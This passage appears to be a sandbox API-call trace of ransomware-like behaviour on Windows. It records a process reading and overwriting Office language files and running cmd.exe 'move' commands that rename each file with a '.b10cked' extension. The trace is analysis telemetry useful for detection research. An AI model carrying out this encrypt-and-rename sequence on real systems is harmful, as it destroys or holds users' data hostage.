[0169.384] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.385] ReleaseMutex (hMutex=0xf8) returned 1 [0169.385] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.385] ReleaseMutex (hMutex=0xf8) returned 1 [0169.385] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.385] ReleaseMutex (hMutex=0xf8) returned 1 [0169.385] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.385] ReleaseMutex (hMutex=0xf8) returned 1 [0169.385] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.386] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22617520943) returned 1 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xd160 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xcc78 [0169.389] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xd160 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xd160 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.411] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x68af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x68af, lpOverlapped=0x0) returned 1 [0169.468] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.468] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x68af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x68af, lpOverlapped=0x0) returned 1 [0169.468] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26799, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x68b1 [0169.468] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x68af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x68af, lpOverlapped=0x0) returned 1 [0169.469] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26799, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x68b1 [0169.470] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x68af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x68af, lpOverlapped=0x0) returned 1 [0169.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0169.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0169.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xd160 [0169.476] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0169.477] CloseHandle (hObject=0x114) returned 1 [0169.481] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX") returned 0x3c [0169.482] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0169.483] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x9bc, dwThreadId=0x9ac)) returned 1 [0169.491] CloseHandle (hObject=0x1b4) returned 1 [0169.491] CloseHandle (hObject=0x114) returned 1 [0169.491] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.491] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.491] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0169.491] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.491] ReleaseMutex (hMutex=0xf8) returned 1 [0169.491] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.491] ReleaseMutex (hMutex=0xf8) returned 1 [0169.491] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.491] ReleaseMutex (hMutex=0xf8) returned 1 [0169.491] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.491] ReleaseMutex (hMutex=0xf8) returned 1 [0169.491] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22639509765) returned 1 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.608] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.608] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.608] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x43078 [0169.608] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x43560 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x43560 [0169.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.835] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0169.868] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0169.883] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0169.885] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.885] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0169.886] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0169.886] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0169.886] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x23560 [0169.886] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0169.887] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0169.888] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0169.889] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x23560 [0169.890] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0169.890] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, 